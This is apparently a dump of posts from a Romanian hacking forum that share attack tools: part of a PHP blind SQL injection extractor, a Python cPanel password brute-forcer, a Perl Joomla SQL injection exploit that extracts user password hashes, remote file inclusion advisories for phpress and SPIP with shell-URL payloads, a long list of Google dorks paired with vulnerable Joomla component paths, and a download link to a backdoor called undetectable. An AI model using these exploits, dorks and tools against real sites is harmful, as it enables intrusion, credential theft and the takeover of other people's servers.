while ($i<=$cmax)
{
$check = "=$i";
if (!empty($result)) $status = "(".$result.")";
echo "<script>InsertText('Now checking $check $status');</script>";
flush();
if (check($check, $sp, $result))
{
$result .= chr($i);
$sp++;
if (!isset($ot) || !isset($do))
{
$ot = 97;
$do = 122;
}
found($ot, $do, $sp, $result);
}
$i++;
}
if (((empty($result)) && ($sp == 2)) or (empty($result)))
{
echo "<script>InsertText('Failed!');</script>";
flush();
die;
}
else
{
if (isset($output)) save_result("\n Query ".$query." - ".$result."\n");
echo "<script>InsertText('Not full result ($result). Try to increase the range of chars.');</script>";
flush();
die("</tr></td></table></body></html>");
}
}
if (((empty($result)) && ($sp == 2)) or (empty($result)))
{
echo "<script>InsertText('Failed!');</script>";
flush();
die;
}
else die("<script>InsertText('Done!');</script><Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>[b]$query[/b] - $result</Td></Tr></Table></Td></Tr></Table></body></html>");
}
function check($check, $sp, $result)
{
global $path, $host, $param, $query, $string;
$packet = "GET ".$path."?".$param."%20AND%20ascii(lower(substring(".urlencode($query).",".$sp.",1)))".$check." HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$html = sendpacket($packet);
if (strpos($html,$string) > 0) return 1;
return 0;
}
function mode4($url, $string, $query, $ot, $do)
{
global $log, $proxy, $host, $path, $param;
echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>";
flush();
found($ot, $do, 1, "");
}
if (($mode_post == 2) || ($mode_post == 3) ) echo "<script>InsertText('Completed - 100%');</script>";
echo "</Td></Tr></Table></body></html>";
flush();
?> -
#!usr/bin/python
import threading, time, random, sys, urllib2, httplib, base64
from copy import copy
def title():
print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0"
print "\t-----------------------------------------------------\n"
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) !=5:
title()
print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n"
print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n"
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return users[0], value[0][:-1]
else:
return users[0][:-1], value[0][:-1]
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
pass
else:
print "This page isn't protected by basic authentication.\n"
sys.exit(1)
if not hasattr(e, 'code') or e.code != 401:
print "\nThis page isn't protected by basic authentication."
print 'But we failed for another reason.\n'
sys.exit(1)
authline = e.headers.get('www-authenticate', '')
if not authline:
print '\nA 401 error without a basic authentication response header - very weird.\n'
sys.exit(1)
else:
return authline
class Worker(threading.Thread):
def run(self):
username, password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
urllib2.urlopen(server)
print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
except (urllib2.HTTPError, httplib.BadStatusLine), msg:
#print "An error occurred:", msg
pass
title()
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":2082"
if sys.argv[2].isdigit() == False:
print "[-] Port must be a number\n"
sys.exit(1)
else:
port = sys.argv[2]
if sys.argv[1][-1] == "/":
sys.argv[1] = sys.argv[1][:-1]
server = sys.argv[1]+":"+port
print "[+] Server:",server
print "[+] Port:",port
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+]",getauth(server)
print "[+] Started",timer(),"\n"
for i in range(len(words)*len(users)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
print "\n[-] Done -",timer(),"\n"- 1
-
It's called "SQLRIP" and it's for ripping informations like the username, mail address and the hash from an SQL Database.
It supports phpBB, Woltlab Burning Board, Simple Machines Forum, vBulletin, PHPKit and webspell. -
Vedeti ca in arhiva este un fisier .txt, cititi ce scrie in el.
Eu nu am inteles mai nimic... cum sa folosesc... daca intelegeti careva si testati sa imi explicati si mie daca vreti.
Download: http://rapidshare.com/files/51381520/VNC_Mini-Backdoor.rar
-
#!/usr/bin/perl -w
#(C)oded by illuz1oN
use LWP::UserAgent;
{
print "[*]Site To Attack: ";
chomp($site=<STDIN>);
my $www = new LWP::UserAgent;
my $exploit="$site/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*";
my $xpl = $www->get($exploit) or vuln();
$xpl->content()=~/([0-9,a-f]{32})/ or vuln();
print "\n[*]Hash Is: $1\n";
}
sub vuln {
print qq[\n/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
/~~~~~~~~~Site Was Not Vulnerable~~~~~~~/
/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
];
exit;
} -
click dreapta pentru a vedea meniul...
deocamdata este 100% nedetectabil.
-
:::::::::::::::::::::::::::::::::::::::::::::::::::..................... ..
: \ | (_) | \ | | / ____|
: \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _____ __
: . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \ \ /\ / /
: |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\ V V /
:_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___| \_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
::::::::Info::.
::Script: phpress
::Version: 0.2.0
::Homepage:[url]http://sourceforge.net/projects/phpress/[/url]
::
:::::::::Details::.
::Type: Remote_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: [url]http://host/phpress/adisplay.php?lang=shell[/url]
::
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: cerbelum@xxxxxxxxx
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. -
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++ SPIP v1.7 Remote File Inclusion Bug ! ++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++DORK : "/SPIP-v1-7-2/"
++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+----------------------------------------------------------------------------------+
+----------------------------------------------------------------------------------+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++ Bug in : "SPIP-v1-7r/inc-calcul.php3"
++----------------------------------------------------------------------------------
++ Vlu Code: -----------------------------
++ || include($squelette_cache); ||
++ -----------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
++==================================================================================
++ Exploit :
++
++ [url]http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?[/url]
++
++==================================================================================
++
+++++++++++++++++++++|Discoverd By :Darkdewil[system-errrror]|++++++++++++++++++++++
++ ++
++++++++++++++++++|Conatact : system-errrror[at]hotmail[dot]com |+++++++++++++++++++
++ ++
++++++++++++|Thx To :Cazanova & fedaiturk & n3twork & codes & by_Ka0s |+++++++++++++
++ ++
++++++++++++++++++++++++|sPECial THanks to :1923turk - grup|++++++++++++++++++++++++
++ ++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -
nemessis ce ai tata? ai baut?
mai gresesc si oamenii
EDIT
ti s-a pus pata pe tine.
-
inurl:"com_flyspray"
Site Sonuna:
/components/com_flyspray/startdown.php?file=shell
Google Dork:
inurl:"com_admin"
Site Sonuna:
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_simpleboard
Site Sonuna:
/components/com_simpleboard/file_upload.php?sbp=shell
Google Dork:
inurl:"com_hashcash"
Site Sonuna:
/components/com_hashcash/server.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_htmlarea3_xtd-c"
Code:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_sitemap"
Code:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_performs"
Site Sonuna:
components/com_performs/performs.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_forum"
Site Sonuna:
/components/com_forum/download.php?phpbb_root_path=
Google Dork:
inurl:"com_pccookbook"
Site Sonuna:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_extcalendar
Site Sonuna:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"minibb"
Site Sonuna:
components/minibb/index.php?absolute_path=shell
Google Dork:
inurl:"com_smf"
Site Sonuna:
/components/com_smf/smf.php?mosConfig_absolute_path=
Site Sonuna2:
/modules/mod_calendar.php?absolute_path=shell
Google Dork:
inurl:"com_pollxt"
Site Sonuna:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_loudmounth"
Site Sonuna:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_videodb"
Site Sonuna:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_pcchess
Site Sonuna:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_multibanners"
Site Sonuna:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_a6mambohelpdesk"
Site Sonuna:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell
Google Dork:
inurl:"com_colophon"
Site Sonuna:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_mgm"
Site Sonuna:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_mambatstaff"
Site Sonuna:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_securityimages"
Site Sonuna:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_artlinks"
Site Sonuna:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_galleria"
Site Sonuna:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_akocomment"
Site Sonuna:
/akocomments.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_cropimage"
Site Sonuna:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
Google Dork:
inurl:"com_kochsuite"
Site Sonuna:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_comprofiler"
Site Sonuna:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_zoom"
Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_serverstat"
Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_fm"
Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=shell
Google Dork:
inurl:com_mambelfish
Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell -
clar audi
WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection
in Exploituri
Posted